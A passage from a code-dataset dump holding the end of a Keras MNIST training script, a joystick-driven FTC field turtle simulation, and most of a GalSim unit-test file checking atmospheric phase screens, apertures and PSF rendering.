plt.imsave(DATA_SET + '_{}.png'.format(true_class[cls_ex[0]]),\n x_test[cls_ex[0]].squeeze())\n\n\ndef plot():\n mn = min(np.min(pre_learn_weights), np.min(post_learn_weights))\n mx = max(np.max(pre_learn_weights), np.max(post_learn_weights))\n plt.hist(pre_learn_weights, label='Pre Training', range=(mn, mx), bins=1000, alpha=0.6)\n plt.hist(post_learn_weights, label='Post Training', range=(mn, mx), bins=1000, alpha=0.6)\n plt.legend()\n plt.savefig(DATA_SET + '_plt.png')\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n LOUD = sys.argv[1].lower() == 'true'\n\n x_train, y_train, x_test, y_test = load_data()\n\n model = Sequential()\n model.add(Conv2D(20, kernel_size=(3, 3), activation='relu', input_shape=SHAPE))\n model.add(Conv2D(40, kernel_size=(3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n model.add(Flatten())\n model.add(Dense(80, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(10, activation='softmax'))\n model.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.Adadelta(),\n metrics=['accuracy'])\n\n if LOUD:\n pre_learn_weights = extract_weights()\n\n model.fit(x_train, y_train, batch_size=BATCH_SIZE, epochs=EPOCHS, verbose=1,\n validation_data=(x_test, y_test))\n loss, acc = model.evaluate(x_test, y_test, verbose=0)\n\n print('Loss: {loss} \\t Accuracy: {acc}'.format(loss=loss, acc=acc))\n if LOUD:\n mrs_labeled()\n post_learn_weights = extract_weights()\n plot()\n","sub_path":"Problem Set 2/train_mnist.py","file_name":"train_mnist.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"544367627","text":"import ftc_field\n\nturtle = ftc_field.turtle.Turtle()\nftc_field.setup_turtle(turtle, [34.5/2, 34.5/2, 45])\nftc_field.setup_playing_field(turtle)\n\nimport joystick\n\ndx = 0\ndy = 0\ndh = 0\n\nturtle.setheading(90)\nturtle.penup()\nturtle.turtlesize(4.5, 4.5)\n\nwhile True:\n for event in joystick.poll_events():\n if event.axis == 0:\n dx = event.value\n elif event.axis == 1:\n dy = event.value\n else:\n dh = event.value\n \n turtle.setpos(turtle.pos() + (dx, -dy))\n turtle.setheading(turtle.heading() - dh*10)","sub_path":"Simulation/teleop.py","file_name":"teleop.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"7765133","text":"# Copyright (c) 2012-2017 by the GalSim developers team on GitHub\n# https://github.com/GalSim-developers\n#\n# This file is part of GalSim: The modular galaxy image simulation toolkit.\n# https://github.com/GalSim-developers/GalSim\n#\n# GalSim is free software: redistribution and use in source and binary forms,\n# with or without modification, are permitted provided that the following\n# conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions, and the disclaimer given in the accompanying LICENSE\n# file.\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions, and the disclaimer given in the documentation\n# and/or other materials provided with the distribution.\n#\n\nfrom __future__ import print_function\nimport os\nimport numpy as np\nfrom galsim_test_helpers import *\n\ntry:\n import galsim\n\nexcept ImportError:\n import sys\n path, filename = os.path.split(__file__)\n sys.path.append(os.path.abspath(os.path.join(path, \"..\")))\n import galsim\n\n\nimgdir = os.path.join(\".\", \"Optics_comparison_images\") # Directory containing the reference images.\npp_file = 'sample_pupil_rolled.fits'\n\ntheta0 = (0*galsim.arcmin, 0*galsim.arcmin)\n\n@timer\ndef test_aperture():\n \"\"\"Test various ways to construct Apertures.\"\"\"\n # Simple tests for constructing and pickling Apertures.\n aper1 = galsim.Aperture(diam=1.0)\n im = galsim.fits.read(os.path.join(imgdir, pp_file))\n aper2 = galsim.Aperture(diam=1.0, pupil_plane_im=im)\n do_pickle(aper1)\n do_pickle(aper2)\n # Automatically created Aperture should match one created via OpticalScreen\n aper1 = galsim.Aperture(diam=1.0)\n aper2 = galsim.Aperture(diam=1.0, lam=500, screen_list=[galsim.OpticalScreen(diam=1.0)])\n err_str = (\"Aperture created implicitly using Airy does not match Aperture created using \"\n \"OpticalScreen.\")\n assert aper1 == aper2, err_str\n\n\n@timer\ndef test_atm_screen_size():\n \"\"\"Test for consistent AtmosphericScreen size and scale.\"\"\"\n screen_size = 10.0\n screen_scale = 0.1\n atm = galsim.AtmosphericScreen(screen_size=screen_size, screen_scale=screen_scale)\n # AtmosphericScreen will preserve screen_scale, but will adjust screen_size as necessary to get\n # a good FFT size.\n assert atm.screen_scale == screen_scale\n assert screen_size < atm.screen_size < 1.5*screen_size\n np.testing.assert_equal(atm.screen_size, atm.npix * atm.screen_scale,\n \"Inconsistent atmospheric screen size and scale.\")\n\n\n@timer\ndef test_structure_function():\n \"\"\"Test that AtmosphericScreen generates approximately the right structure function for infinite\n outer scale.\n \"\"\"\n rng = galsim.BaseDeviate(4815162342)\n r0_500 = 0.2\n L0 = None\n screen_scale = 0.05\n screen_size = 100.0\n\n # Theoretical pure Kolmogorov structure function (at 500 nm!):\n D_kolm = lambda r: 6.8839 * (r/r0_500)**(5./3)\n\n atm = galsim.AtmosphericScreen(screen_size=screen_size, screen_scale=screen_scale,\n r0_500=r0_500, L0=L0, rng=rng)\n phase = atm._tab2d.table.getVals()[:-1, :-1].copy()\n phase *= 2 * np.pi / 500.0 # nm -> radians\n im = galsim.Image(phase, scale=screen_scale)\n D_sim = galsim.utilities.structure_function(im)\n\n print(\"r D_kolm D_sim\")\n for r in [0.5, 2.0, 5.0]: # Only check values far from the screen size and scale.\n # We're only attempting to verify that we haven't missed a factor of 2 or pi or\n # something like that here, so set the rtol below to be *very* forgiving. Since the\n # structure function varies quite quickly as r**(5./3), this is still a useful test.\n # For the parameters above (including the random seed), D_kolm(r) and D_sim(r) are actually\n # consistent at about the 15% level in the test below. It's difficult to predict how\n # consistent they *should* be though, since the simulated structure function estimate is\n # sensitive to resolution and edge effects, as well as the particular realization of the\n # field.\n print(r, D_kolm(r), D_sim(r))\n np.testing.assert_allclose(D_kolm(r), D_sim(r), rtol=0.5,\n err_msg=\"Simulated structure function not close to prediction.\")\n\n\n@timer\ndef test_phase_screen_list():\n \"\"\"Test list-like behaviors of PhaseScreenList.\"\"\"\n rng = galsim.BaseDeviate(1234)\n rng2 = galsim.BaseDeviate(123)\n\n aper = galsim.Aperture(diam=1.0)\n\n ar1 = galsim.AtmosphericScreen(10, 1, alpha=0.997, L0=None, time_step=0.01, rng=rng)\n assert ar1._time == 0.0, \"AtmosphericScreen initialized with non-zero time.\"\n do_pickle(ar1)\n do_pickle(ar1, func=lambda x: x._tab2d(12.3, 45.6))\n do_pickle(ar1, func=lambda x: x._wavefront(aper.u, aper.v, None, theta0).sum())\n do_pickle(ar1, func=lambda x: x.wavefront(aper.u, aper.v, 0.0).sum())\n do_pickle(ar1, func=lambda x: np.sum(x.wavefront_gradient(aper.u, aper.v, 0.0)))\n t = np.empty_like(aper.u)\n ud = galsim.UniformDeviate(rng.duplicate())\n ud.generate(t.ravel())\n t *= 0.1 # Only do a few boiling steps\n do_pickle(ar1, func=lambda x: x.wavefront(aper.u, aper.v, t).sum())\n do_pickle(ar1, func=lambda x: np.sum(x.wavefront_gradient(aper.u, aper.v, t)))\n\n # Try seeking backwards\n assert ar1._time > 0.0\n ar1._seek(0.0)\n # But not before t=0.0\n with assert_raises(ValueError):\n ar1._seek(-1.0)\n\n # Check that L0=np.inf and L0=None yield the same thing here too.\n ar2 = galsim.AtmosphericScreen(10, 1, alpha=0.997, L0=np.inf, time_step=0.01, rng=rng)\n assert ar1 == ar2\n # Create a couple new screens with different types/parameters\n ar2 = galsim.AtmosphericScreen(10, 1, alpha=0.995, time_step=0.015, rng=rng2)\n assert ar1 != ar2\n ar3 = galsim.OpticalScreen(diam=1.0, aberrations=[0, 0, 0, 0, 0, 0, 0, 0, 0.1])\n do_pickle(ar3)\n do_pickle(ar3, func=lambda x:x._wavefront(aper.u, aper.v, None, theta0).sum())\n do_pickle(ar3, func=lambda x:np.sum(x._wavefront_gradient(aper.u, aper.v, None, theta0)))\n do_pickle(ar3, func=lambda x:x.wavefront(aper.u, aper.v).sum())\n do_pickle(ar3, func=lambda x:np.sum(x.wavefront_gradient(aper.u, aper.v)))\n atm = galsim.Atmosphere(screen_size=30.0,\n altitude=[0.0, 1.0],\n speed=[1.0, 2.0],\n direction=[0.0*galsim.degrees, 120*galsim.degrees],\n r0_500=0.15,\n rng=rng)\n atm.append(ar3)\n do_pickle(atm)\n do_pickle(atm, func=lambda x:x._wavefront(aper.u, aper.v, None, theta0).sum())\n do_pickle(atm, func=lambda x:x.wavefront(aper.u, aper.v, 0.0, theta0).sum())\n do_pickle(atm, func=lambda x:np.sum(x.wavefront_gradient(aper.u, aper.v, 0.0)))\n do_pickle(atm, func=lambda x:np.sum(x._wavefront_gradient(aper.u, aper.v, 0.0, theta0)))\n\n # testing append, extend, __getitem__, __setitem__, __delitem__, __eq__, __ne__\n atm2 = galsim.PhaseScreenList(atm[:-1]) # Refers to first n-1 screens\n assert atm != atm2\n # Append a different screen to the end of atm2\n atm2.append(ar2)\n assert atm != atm2\n # Swap the last screen in atm2 for the one that should match atm.\n del atm2[-1]\n atm2.append(atm[-1])\n assert atm == atm2\n\n # Test building from empty PhaseScreenList\n atm3 = galsim.PhaseScreenList()\n atm3.extend(atm2)\n assert atm == atm3\n\n # Test constructing from existing PhaseScreenList\n atm4 = galsim.PhaseScreenList(atm3)\n del atm4[-1]\n assert atm != atm4\n atm4.append(atm[-1])\n assert atm == atm4\n\n # Test swap\n atm4[0], atm4[1] = atm4[1], atm4[0]\n assert atm != atm4\n atm4[0], atm4[1] = atm4[1], atm4[0]\n assert atm == atm4\n\n wf = atm._wavefront(aper.u, aper.v, None, theta0)\n wf2 = atm2._wavefront(aper.u, aper.v, None, theta0)\n wf3 = atm3._wavefront(aper.u, aper.v, None, theta0)\n wf4 = atm4._wavefront(aper.u, aper.v, None, theta0)\n\n np.testing.assert_array_equal(wf, wf2, \"PhaseScreenLists are inconsistent\")\n np.testing.assert_array_equal(wf, wf3, \"PhaseScreenLists are inconsistent\")\n np.testing.assert_array_equal(wf, wf4, \"PhaseScreenLists are inconsistent\")\n\n # Check copy\n import copy\n # Shallow copy copies by reference.\n atm5 = copy.copy(atm)\n assert atm[0] == atm5[0]\n assert atm[0] is atm5[0]\n atm._seek(1.0)\n assert atm[0]._time == 1.0, \"Wrong time for AtmosphericScreen\"\n assert atm[0] == atm5[0]\n assert atm[0] is atm5[0]\n # Deepcopy actually makes an indepedent object in memory.\n atm5 = copy.deepcopy(atm)\n assert atm[0] == atm5[0]\n assert atm[0] is not atm5[0]\n atm._seek(2.0)\n assert atm[0]._time == 2.0, \"Wrong time for AtmosphericScreen\"\n # But we still get equality, since this doesn't depend on mutable internal state:\n assert atm[0] == atm5[0]\n\n # Constructor should accept both list and indiv layers as arguments.\n atm6 = galsim.PhaseScreenList(atm[0])\n atm7 = galsim.PhaseScreenList([atm[0]])\n assert atm6 == atm7\n do_pickle(atm6, func=lambda x:x._wavefront(aper.u, aper.v, None, theta0).sum())\n do_pickle(atm6, func=lambda x:np.sum(x.wavefront_gradient(aper.u, aper.v, 0.0)))\n\n atm6 = galsim.PhaseScreenList(atm[0], atm[1])\n atm7 = galsim.PhaseScreenList([atm[0], atm[1]])\n atm8 = galsim.PhaseScreenList(atm[0:2]) # Slice returns PhaseScreenList, so this works too.\n assert atm6 == atm7\n assert atm6 == atm8\n\n # Check some actual derived PSFs too, not just phase screens. Use a small pupil_plane_size and\n # relatively large pupil_plane_scale to speed up the unit test.\n atm._reset()\n assert atm[0]._time == 0.0, \"Wrong time for AtmosphericScreen\"\n kwargs = dict(exptime=0.05, time_step=0.01, diam=1.1, lam=1000.0)\n psf = atm.makePSF(**kwargs)\n do_pickle(psf)\n do_pickle(psf, func=lambda x:x.drawImage(nx=20, ny=20, scale=0.1))\n\n psf2 = atm2.makePSF(**kwargs)\n psf3 = atm3.makePSF(**kwargs)\n psf4 = atm4.makePSF(**kwargs)\n\n np.testing.assert_array_equal(psf, psf2, \"PhaseScreenPSFs are inconsistent\")\n np.testing.assert_array_equal(psf, psf3, \"PhaseScreenPSFs are inconsistent\")\n np.testing.assert_array_equal(psf, psf4, \"PhaseScreenPSFs are inconsistent\")\n\n\n@timer\ndef test_frozen_flow():\n \"\"\"Test that frozen flow screen really is frozen, i.e., phase(x=0, t=0) == phase(x=v*t, t=t).\"\"\"\n rng = galsim.BaseDeviate(1234)\n vx = 1.0 # m/s\n t = 0.05 # s\n x = vx*t # 0.05 m\n dx = x\n alt = x/1000 # -> 0.00005 km; silly example, but yields exact results...\n\n screen = galsim.AtmosphericScreen(1.0, dx, alt, vx=vx, rng=rng)\n import warnings\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n aper = galsim.Aperture(diam=1, pupil_plane_size=20., pupil_plane_scale=20./dx)\n wf0 = screen._wavefront(aper.u, aper.v, None, theta0)\n dwdu0, dwdv0 = screen.wavefront_gradient(aper.u, aper.v, t=screen._time)\n screen._seek(t)\n assert screen._time == t, \"Wrong time for AtmosphericScreen\"\n wf1 = screen._wavefront(aper.u, aper.v, None, theta=(45*galsim.degrees, 0*galsim.degrees))\n dwdu1, dwdv1 = screen.wavefront_gradient(aper.u, aper.v, t=screen._time,\n theta=(45*galsim.degrees, 0*galsim.degrees))\n\n np.testing.assert_array_almost_equal(wf0, wf1, 5, \"Flow is not frozen\")\n np.testing.assert_array_almost_equal(dwdu0, dwdu1, 5, \"Flow is not frozen\")\n np.testing.assert_array_almost_equal(dwdu0, dwdu1, 5, \"Flow is not frozen\")\n\n # We should be able to rewind too.\n screen._seek(0.01)\n np.testing.assert_allclose(screen._time, 0.01, err_msg=\"Wrong time for AtmosphericScreen\")\n wf2 = screen.wavefront(aper.u, aper.v, 0.0)\n np.testing.assert_array_almost_equal(wf0, wf2, 5, \"Flow is not frozen\")\n\n\n@timer\ndef test_phase_psf_reset():\n \"\"\"Test that phase screen reset() method correctly resets the screen to t=0.\"\"\"\n rng = galsim.BaseDeviate(1234)\n # Test frozen AtmosphericScreen first\n atm = galsim.Atmosphere(screen_size=30.0, altitude=10.0, speed=0.1, alpha=1.0, rng=rng)\n aper = galsim.Aperture(diam=1.0, lam=500.0)\n wf1 = atm._wavefront(aper.u, aper.v, None, theta0)\n wf2 = atm.wavefront(aper.u, aper.v, 0.0, theta0)\n assert np.all(wf1 == wf2)\n\n atm._seek(1.0)\n wf3 = atm._wavefront(aper.u, aper.v, None, theta0)\n wf4 = atm.wavefront(aper.u, aper.v, 1.0, theta0)\n assert np.all(wf3 == wf4)\n\n # Verify that atmosphere did advance\n assert not np.all(wf1 == wf3)\n\n # Now verify that reset brings back original atmosphere\n atm._reset()\n wf3 = atm._wavefront(aper.u, aper.v, None, theta0)\n np.testing.assert_array_equal(wf1, wf3, \"Phase screen didn't reset\")\n\n # Now check with boiling, but no wind.\n atm = galsim.Atmosphere(screen_size=30.0, altitude=10.0, alpha=0.997, time_step=0.01, rng=rng)\n wf1 = atm._wavefront(aper.u, aper.v, None, theta0)\n atm._seek(0.1)\n wf2 = atm._wavefront(aper.u, aper.v, None, theta0)\n # Verify that atmosphere did advance\n assert not np.all(wf1 == wf2)\n\n # Now verify that reset brings back original atmosphere\n atm._reset()\n wf3 = atm._wavefront(aper.u, aper.v, None, theta0)\n np.testing.assert_array_equal(wf1, wf3, \"Phase screen didn't reset\")\n\n\n@timer\ndef test_phase_psf_batch():\n \"\"\"Test that PSFs generated and drawn serially match those generated and drawn in batch.\"\"\"\n import time\n NPSFs = 10\n exptime = 0.3\n rng = galsim.BaseDeviate(1234)\n atm = galsim.Atmosphere(screen_size=10.0, altitude=10.0, alpha=0.997, time_step=0.01, rng=rng)\n theta = [(i*galsim.arcsec, i*galsim.arcsec) for i in range(NPSFs)]\n\n kwargs = dict(lam=1000.0, exptime=exptime, diam=1.0)\n\n t1 = time.time()\n psfs = [atm.makePSF(theta=th, **kwargs) for th in theta]\n imgs = [psf.drawImage() for psf in psfs]\n print('time for {0} PSFs in batch: {1:.2f} s'.format(NPSFs, time.time() - t1))\n\n t2 = time.time()\n more_imgs = []\n for th in theta:\n psf = atm.makePSF(theta=th, **kwargs)\n more_imgs.append(psf.drawImage())\n print('time for {0} PSFs in serial: {1:.2f} s'.format(NPSFs, time.time() - t2))\n\n for img1, img2 in zip(imgs, more_imgs):\n np.testing.assert_array_equal(\n img1, img2,\n \"Individually generated AtmosphericPSF differs from AtmosphericPSF generated in batch\")\n\n\n@timer\ndef test_opt_indiv_aberrations():\n \"\"\"Test that aberrations specified by name match those specified in `aberrations` list.\"\"\"\n screen1 = galsim.OpticalScreen(diam=4.0, tip=0.2, tilt=0.3, defocus=0.4, astig1=0.5, astig2=0.6,\n coma1=0.7, coma2=0.8, trefoil1=0.9, trefoil2=1.0, spher=1.1)\n screen2 = galsim.OpticalScreen(diam=4.0, aberrations=[0.0, 0.0, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7,\n 0.8, 0.9, 1.0, 1.1])\n\n psf1 = galsim.PhaseScreenList(screen1).makePSF(diam=4.0, lam=500.0)\n psf2 = galsim.PhaseScreenList(screen2).makePSF(diam=4.0, lam=500.0)\n\n np.testing.assert_array_equal(\n psf1.img, psf2.img,\n \"Individually specified aberrations differs from aberrations specified as list.\")\n\n\n@timer\ndef test_scale_unit():\n \"\"\"Test that `scale_unit` keyword correctly sets the units for PhaseScreenPSF.\"\"\"\n aper = galsim.Aperture(diam=1.0)\n rng = galsim.BaseDeviate(1234)\n # Test frozen AtmosphericScreen first\n atm = galsim.Atmosphere(screen_size=30.0, altitude=10.0, speed=0.1, alpha=1.0, rng=rng)\n psf = galsim.PhaseScreenPSF(atm, 500.0, aper=aper, scale_unit=galsim.arcsec)\n im1 = psf.drawImage(nx=32, ny=32, scale=0.1, method='no_pixel')\n psf2 = galsim.PhaseScreenPSF(atm, 500.0, aper=aper, scale_unit=galsim.arcmin)\n im2 = psf2.drawImage(nx=32, ny=32, scale=0.1/60.0, method='no_pixel')\n np.testing.assert_almost_equal(\n im1.array, im2.array, 8,\n 'PhaseScreenPSF inconsistent use of scale_unit')\n\n opt_psf1 = galsim.OpticalPSF(lam=500.0, diam=1.0, scale_unit=galsim.arcsec)\n opt_psf2 = galsim.OpticalPSF(lam=500.0, diam=1.0, scale_unit='arcsec')\n assert opt_psf1 == opt_psf2, \"scale unit did not parse as string\"\n\n\n@timer\ndef test_stepk_maxk():\n \"\"\"Test options to specify (or not) stepk and maxk.\n \"\"\"\n aper = galsim.Aperture(diam=1.0)\n rng = galsim.BaseDeviate(123456)\n # Test frozen AtmosphericScreen first\n atm = galsim.Atmosphere(screen_size=30.0, altitude=10.0, speed=0.1, alpha=1.0, rng=rng)\n psf = galsim.PhaseScreenPSF(atm, 500.0, aper=aper, scale_unit=galsim.arcsec)\n stepk = psf.stepk\n maxk = psf.maxk\n\n psf2 = galsim.PhaseScreenPSF(atm, 500.0, aper=aper, scale_unit=galsim.arcsec,\n _force_stepk=stepk/1.5, _force_maxk=maxk*2.0)\n np.testing.assert_almost_equal(\n psf2.stepk, stepk/1.5, decimal=7,\n err_msg=\"PhaseScreenPSF did not adopt forced value for stepk\")\n np.testing.assert_almost_equal(\n psf2.maxk, maxk*2.0, decimal=7,\n err_msg=\"PhaseScreenPSF did not adopt forced value for maxk\")\n do_pickle(psf)\n do_pickle(psf2)\n\n # Try out non-geometric-shooting\n psf3 = atm.makePSF(lam=500.0, aper=aper, geometric_shooting=False)\n img = galsim.Image(32, 32, scale=0.2)\n do_shoot(psf3, img, \"PhaseScreenPSF\")\n # Also make sure a few other methods at least run\n psf3.centroid\n psf3.max_sb\n\n\n@timer\ndef test_ne():\n \"\"\"Test Apertures, PhaseScreens, PhaseScreenLists, and PhaseScreenPSFs for not-equals.\"\"\"\n pupil_plane_im = galsim.fits.read(os.path.join(imgdir, pp_file))\n\n # Test galsim.Aperture __ne__\n objs = [galsim.Aperture(diam=1.0),\n galsim.Aperture(diam=1.1),\n galsim.Aperture(diam=1.0, oversampling=1.5),\n galsim.Aperture(diam=1.0, pad_factor=1.5),\n galsim.Aperture(diam=1.0, circular_pupil=False),\n galsim.Aperture(diam=1.0, obscuration=0.3),\n galsim.Aperture(diam=1.0, nstruts=3),\n galsim.Aperture(diam=1.0, nstruts=3, strut_thick=0.2),\n galsim.Aperture(diam=1.0, nstruts=3, strut_angle=15*galsim.degrees),\n galsim.Aperture(diam=1.0, pupil_plane_im=pupil_plane_im),\n galsim.Aperture(diam=1.0, pupil_plane_im=pupil_plane_im,\n pupil_angle=10.0*galsim.degrees)]\n all_obj_diff(objs)\n\n # Test AtmosphericScreen __ne__\n rng = galsim.BaseDeviate(1)\n objs = [galsim.AtmosphericScreen(10.0, rng=rng),\n galsim.AtmosphericScreen(10.0, rng=rng, vx=1.0),\n galsim.AtmosphericScreen(10.0, rng=rng, vy=1.0),\n galsim.AtmosphericScreen(10.0, rng=rng, alpha=0.999, time_step=0.01),\n galsim.AtmosphericScreen(10.0, rng=rng, altitude=1.0),\n galsim.AtmosphericScreen(10.0, rng=rng, alpha=0.999, time_step=0.02),\n galsim.AtmosphericScreen(10.0, rng=rng, alpha=0.998, time_step=0.02),\n galsim.AtmosphericScreen(10.0, rng=rng, r0_500=0.1),\n galsim.AtmosphericScreen(10.0, rng=rng, L0=10.0),\n galsim.AtmosphericScreen(10.0, rng=rng, vx=10.0),\n ]\n all_obj_diff(objs)\n\n # Test OpticalScreen __ne__\n objs = [galsim.OpticalScreen(diam=1.0, ),\n galsim.OpticalScreen(diam=1.0, tip=1.0),\n galsim.OpticalScreen(diam=1.0, tilt=1.0),\n galsim.OpticalScreen(diam=1.0, defocus=1.0),\n galsim.OpticalScreen(diam=1.0, astig1=1.0),\n galsim.OpticalScreen(diam=1.0, astig2=1.0),\n galsim.OpticalScreen(diam=1.0, coma1=1.0),\n galsim.OpticalScreen(diam=1.0, coma2=1.0),\n galsim.OpticalScreen(diam=1.0, trefoil1=1.0),\n galsim.OpticalScreen(diam=1.0, trefoil2=1.0),\n galsim.OpticalScreen(diam=1.0, spher=1.0),\n galsim.OpticalScreen(diam=1.0, spher=1.0, lam_0=100.0),\n galsim.OpticalScreen(diam=1.0, aberrations=[0,0,1.1]), # tip=1.1\n ]\n all_obj_diff(objs)\n\n # Test PhaseScreenList __ne__\n atm = galsim.Atmosphere(10.0, vx=1.0)\n objs = [galsim.PhaseScreenList(atm),\n galsim.PhaseScreenList(objs), # Reuse list of OpticalScreens above\n galsim.PhaseScreenList(objs[0:2])]\n all_obj_diff(objs)\n\n # Test PhaseScreenPSF __ne__\n psl = galsim.PhaseScreenList(atm)\n objs = [galsim.PhaseScreenPSF(psl, 500.0, exptime=0.03, diam=1.0)]\n objs += [galsim.PhaseScreenPSF(psl, 700.0, exptime=0.03, diam=1.0)]\n objs += [galsim.PhaseScreenPSF(psl, 700.0, exptime=0.03, diam=1.1)]\n objs += [galsim.PhaseScreenPSF(psl, 700.0, exptime=0.03, diam=1.0, flux=1.1)]\n objs += [galsim.PhaseScreenPSF(psl, 700.0, exptime=0.03, diam=1.0, interpolant='linear')]\n stepk = objs[0].stepk\n maxk = objs[0].maxk\n objs += [galsim.PhaseScreenPSF(psl, 700.0, exptime=0.03, diam=1.0, _force_stepk=stepk/1.5)]\n objs += [galsim.PhaseScreenPSF(psl, 700.0, exptime=0.03, diam=1.0, _force_maxk=maxk*2.0)]\n all_obj_diff(objs)\n\n\n@timer\ndef test_phase_gradient_shoot():\n # Make the atmosphere\n seed = 12345\n r0_500 = 0.2 # m\n nlayers = 6\n screen_size = 102.4 # m\n screen_scale = 0.1 # m\n max_speed = 20 # m/s\n\n rng = galsim.BaseDeviate(seed)\n u = galsim.UniformDeviate(rng)\n\n # Use atmospheric weights from 1998 Gemini site selection process as something reasonably\n # realistic. (Ellerbroek 2002, JOSA Vol 19 No 9).\n Ellerbroek_alts = [0.0, 2.58, 5.16, 7.73, 12.89, 15.46] # km\n Ellerbroek_weights = [0.652, 0.172, 0.055, 0.025, 0.074, 0.022]\n Ellerbroek_interp = galsim.LookupTable(\n Ellerbroek_alts,\n Ellerbroek_weights,\n interpolant='linear')\n alts = np.max(Ellerbroek_alts)*np.arange(nlayers)/(nlayers-1)\n weights = Ellerbroek_interp(alts)\n weights /= sum(weights)\n\n spd = [] # Wind speed in m/s\n dirn = [] # Wind direction in radians\n r0_500s = [] # Fried parameter in m at a wavelength of 500 nm.\n for i in range(nlayers):\n spd.append(u()*max_speed)\n dirn.append(u()*360*galsim.degrees)\n r0_500s.append(r0_500*weights[i]**(-3./5))\n atm = galsim.Atmosphere(r0_500=r0_500, speed=spd, direction=dirn, altitude=alts, rng=rng,\n screen_size=screen_size, screen_scale=screen_scale)\n\n lam = 500.0\n diam = 4.0\n pad_factor = 1.0\n oversampling = 1.0\n\n aper = galsim.Aperture(diam=diam, lam=lam,\n screen_list=atm, pad_factor=pad_factor,\n oversampling=oversampling)\n\n xs = np.empty((10,), dtype=float)\n ys = np.empty((10,), dtype=float)\n u.generate(xs)\n u.generate(ys)\n thetas = [(x*galsim.degrees, y*galsim.degrees) for x, y in zip(xs, ys)]\n\n if __name__ == '__main__':\n exptime = 15.0\n centroid_tolerance = 0.05\n second_moment_tolerance = 0.5\n else:\n exptime = 0.2\n centroid_tolerance = 0.2\n second_moment_tolerance = 1.5\n\n psfs = [atm.makePSF(lam, diam=diam, theta=th, exptime=exptime, aper=aper) for th in thetas]\n shoot_moments = []\n fft_moments = []\n\n # At the moment, Ixx and Iyy (but not Ixy) are systematically smaller in phase gradient shooting\n # mode than in FFT mode. For now, I'm willing to accept this, but we should revisit it once we\n # get the \"second kick\" approximation implemented.\n offset = 0.5\n\n for psf in psfs:\n im_shoot = psf.drawImage(nx=48, ny=48, scale=0.05, method='phot', n_photons=100000, rng=rng)\n im_fft = psf.drawImage(nx=48, ny=48, scale=0.05)\n\n shoot_moment = galsim.utilities.unweighted_moments(im_shoot)\n fft_moment = galsim.utilities.unweighted_moments(im_fft)\n\n for key in ['Mx', 'My']:\n np.testing.assert_allclose(\n shoot_moment[key], fft_moment[key], rtol=0, atol=centroid_tolerance,\n err_msg='Phase gradient centroid {0} not close to fft centroid'.format(key))\n\n for key in ['Mxx', 'Myy']:\n np.testing.assert_allclose(\n shoot_moment[key]+offset, fft_moment[key], rtol=0, atol=second_moment_tolerance,\n err_msg='Phase gradient second moment {} not close to fft moment'.format(key))\n\n np.testing.assert_allclose(\n shoot_moment['Mxy'], fft_moment['Mxy'], rtol=0, atol=second_moment_tolerance,\n err_msg='Phase gradient second moment Mxy not close to fft moment')\n\n shoot_moments.append(shoot_moment)\n fft_moments.append(fft_moment)\n\n # Verify that shoot with rng=None runs\n psf.shoot(100, rng=None)\n\n # Constraints on the ensemble should be tighter than for individual PSFs.\n mean_shoot_moment = {}\n mean_fft_moment = {}\n for k in shoot_moments[0]:\n mean_shoot_moment[k] = np.mean([sm[k] for sm in shoot_moments])\n mean_fft_moment[k] = np.mean([fm[k] for fm in fft_moments])\n\n for key in ['Mx', 'My']:\n np.testing.assert_allclose(\n mean_shoot_moment[key], mean_fft_moment[key], rtol=0, atol=centroid_tolerance,\n err_msg='Mean phase gradient centroid {0} not close to mean fft centroid'\n .format(key))\n\n for key in ['Mxx', 'Myy']:\n np.testing.assert_allclose(\n mean_shoot_moment[key]+offset, mean_fft_moment[key], rtol=0,\n atol=second_moment_tolerance,\n err_msg='Mean phase gradient second moment {} not close to mean fft moment'\n .format(key))\n\n np.testing.assert_allclose(\n mean_shoot_moment['Mxy'], mean_fft_moment['Mxy'], rtol=0, atol=second_moment_tolerance,\n err_msg='Mean phase gradient second moment Mxy not close to mean fft moment')\n\n\n@timer\ndef test_input():\n \"\"\"Check that exceptions are raised for invalid input\"\"\"\n\n # Specifying only one of alpha and time_step is an error.\n assert_raises(ValueError, galsim.AtmosphericScreen, screen_size=10.0, time_step=0.01)\n assert_raises(ValueError, galsim.AtmosphericScreen, screen_size=10.0, alpha=0.997)\n # But specifying both is alright.\n galsim.AtmosphericScreen(screen_size=10.0, alpha=0.997, time_step=0.01)\n\n # Try some variations for Atmosphere\n assert_raises(ValueError, galsim.Atmosphere,\n screen_size=10.0, altitude=[0., 1.],\n r0_500=[0.2, 0.3, 0.2])\n assert_raises(ValueError, galsim.Atmosphere,\n screen_size=10.0, r0_500=[0.4, 0.4, 0.4],\n r0_weights=[0.1, 0.3, 0.6])\n\n\n@timer\ndef test_r0_weights():\n \"\"\"Check that r0_weights functions as expected.\"\"\"\n r0_500 = 0.2\n\n # Check that reassembled net r0_500 matches input\n atm = galsim.Atmosphere(screen_size=10.0, altitude=[0,1,2,3], r0_500=r0_500)\n r0s = [screen.r0_500 for screen in atm]\n np.testing.assert_almost_equal(np.sum([r0**(-5./3) for r0 in r0s])**(-3./5), r0_500)\n\n # Check that old manual calculation matches automatic calculation inside Atmosphere()\n weights = [1, 2, 3, 4]\n normalized_weights = np.array(weights, dtype=float)/np.sum(weights)\n r0s_ref = [r0_500 * w**(-3./5) for w in normalized_weights]\n atm = galsim.Atmosphere(screen_size=10.0, altitude=[0,1,2,3], r0_500=r0_500, r0_weights=weights)\n r0s_test = [screen.r0_500 for screen in atm]\n np.testing.assert_almost_equal(r0s_test, r0s_ref)\n np.testing.assert_almost_equal(np.sum([r0**(-5./3) for r0 in r0s_test])**(-3./5), r0_500)\n\n\n@timer\ndef test_speedup():\n \"\"\"Make sure that photon-shooting a PhaseScreenPSF with geometric approximation yields\n significant speedup.\n 